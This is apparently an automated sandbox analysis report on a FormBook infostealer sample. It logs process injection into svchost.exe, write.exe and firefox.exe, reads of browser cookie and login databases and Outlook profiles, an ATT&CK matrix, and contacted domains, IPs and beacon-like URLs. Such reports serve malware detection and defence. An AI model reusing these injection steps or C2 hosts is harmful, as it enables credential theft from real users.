Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\write.exe

Thread register set: target process: 2892

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\write.exe

Thread APC queued: target process: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 281A008

Jump to behavior

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

0_2_00701201

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_006E2BA5

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0070B226 SendInput,keybd_event,

0_2_0070B226

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_007222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_007222DA

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\pismo1A 12.06.2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

0_2_00700B62

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_00701663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00701663

Source: pismo1A 12.06.2024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: IwDtIjtyhRCIk.exe, 00000004.00000002.4489973256.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000000.2232535344.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4490488908.0000000001991000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: pismo1A 12.06.2024.exe, IwDtIjtyhRCIk.exe, 00000004.00000002.4489973256.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000000.2232535344.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4490488908.0000000001991000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: IwDtIjtyhRCIk.exe, 00000004.00000002.4489973256.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000000.2232535344.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4490488908.0000000001991000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: IwDtIjtyhRCIk.exe, 00000004.00000002.4489973256.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000000.2232535344.0000000001651000.00000002.00000001.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4490488908.0000000001991000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006C0698 cpuid

0_2_006C0698

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_00718195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00718195

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006FD27A GetUserNameW,

0_2_006FD27A

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_006DB952

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006A42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\write.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_81
Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_XP
Source: pismo1A 12.06.2024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_XPe
Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_VISTA
Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_7
Source: pismo1A 12.06.2024.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00721204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00721204
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00721806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00721806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pismo1A 12.06.2024.exe	61%	ReversingLabs	Win32.Trojan.Strab
pismo1A 12.06.2024.exe	42%	Virustotal		Browse
pismo1A 12.06.2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
webuyfontana.com	0%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.am1-728585.com	1%	Virustotal	Browse
www.zhuan-tou.com	1%	Virustotal	Browse
www.witoharmuth.com	0%	Virustotal	Browse
www.magnoliahairandco.com	0%	Virustotal	Browse
www.binpvae.lol	1%	Virustotal	Browse
www.lecoinsa.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://api.w.org/	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.ie8mce.website/3osa/	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Virustotal		Browse
https://www.witoharmuth.de/verkehrswende/	0%	Avira URL Cloud	safe
http://www.witoharmuth.com/jd4u/?fD=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://themeisle.com	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
https://www.west.cn/services/mail/	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/kontakt/	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	0%	Avira URL Cloud	safe
https://www.west.cn/services/mail/	0%	Virustotal		Browse
https://themeisle.com	0%	Virustotal		Browse
https://www.witoharmuth.de/kontakt/	0%	Virustotal		Browse
http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2	0%	Avira URL Cloud	safe
http://www.webuyfontana.com/fhu0/	0%	Avira URL Cloud	safe
https://js.users.51.la/21876343.js	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21	0%	Virustotal		Browse
http://www.kacotae.com/1134/?fD=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Virustotal		Browse
http://www.binpvae.lol/a472/?fD=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
http://www.lecoinsa.net/xu8t/	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/verkehrswende/	0%	Virustotal		Browse
http://www.binpvae.lol/a472/	0%	Avira URL Cloud	safe
https://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN	0%	Avira URL Cloud	safe
https://js.users.51.la/21876343.js	3%	Virustotal		Browse
http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	0%	Virustotal		Browse
https://www.witoharmuth.de/feed/	0%	Avira URL Cloud	safe
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2	0%	Virustotal		Browse
http://www.chowzen.top/fv92/?fD=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
http://www.witoharmuth.com/jd4u/	0%	Avira URL Cloud	safe
http://www.duzane.com/6tsi/	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/feed/	0%	Virustotal		Browse
http://www.witoharmuth.com/jd4u/	0%	Virustotal		Browse
http://www.lunareafurniture.com	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);	0%	Avira URL Cloud	safe
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Virustotal		Browse
https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72	0%	Avira URL Cloud	safe
https://www.west.cn/cloudhost/	0%	Avira URL Cloud	safe
http://www.shrongcen.com/5965/	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/sample-page/	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2	0%	Virustotal		Browse
http://www.skyinftech.com/gwqo/?fD=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);	0%	Virustotal		Browse
https://www.west.cn/cloudhost/	0%	Virustotal		Browse
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72	0%	Virustotal		Browse
https://www.witoharmuth.de/xmlrpc.php?rsd	0%	Avira URL Cloud	safe
http://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/comments/feed/	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/xmlrpc.php?rsd	0%	Virustotal		Browse
http://www.ie8mce.website/3osa/?fD=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://www.west.cn/services/webhosting/	0%	Avira URL Cloud	safe
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2	0%	Avira URL Cloud	safe
https://www.west.cn/services/domain/	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Virustotal		Browse
http://www.webuyfontana.com/fhu0/?fD=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.mg55aa.xyz/2c61/	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/wp-json/	0%	Avira URL Cloud	safe
http://www.zhuan-tou.com/lx5p/	0%	Avira URL Cloud	safe
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/ueber/	0%	Avira URL Cloud	safe
http://www.mg55aa.xyz/2c61/?fD=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://www.witoharmuth.de/sample-page/	0%	Virustotal		Browse
http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21	0%	Avira URL Cloud	safe
http://www.chowzen.top/fv92/	0%	Avira URL Cloud	safe
http://gmpg.org/xfn/11	0%	Avira URL Cloud	safe
http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/asset	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
http://www.shrongcen.com/5965/?fD=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&j0=vTcl_2X8QJ	0%	Avira URL Cloud	safe
https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
webuyfontana.com	15.197.204.56	true	true	0%, Virustotal, Browse	unknown
www.shrongcen.com	123.58.214.101	true	true		unknown
www.chowzen.top	162.0.213.72	true	true		unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	true	0%, Virustotal, Browse	unknown
www.mg55aa.xyz	35.241.34.216	true	false		unknown
www.ie8mce.website	176.113.70.180	true	true		unknown
www.am1-728585.com	123.58.214.101	true	true	1%, Virustotal, Browse	unknown
www.zhuan-tou.com	103.120.80.111	true	true	1%, Virustotal, Browse	unknown
www.lunareafurniture.com	104.21.14.186	true	false		unknown
www.duzane.com	102.222.124.13	true	true		unknown
skyinftech.com	103.138.88.32	true	true		unknown
www.witoharmuth.com	85.13.162.190	true	true	0%, Virustotal, Browse	unknown
www.binpvae.lol	116.213.43.190	true	true	1%, Virustotal, Browse	unknown
www.lecoinsa.net	217.116.0.191	true	true	0%, Virustotal, Browse	unknown
www.kacotae.com	64.226.69.42	true	true		unknown
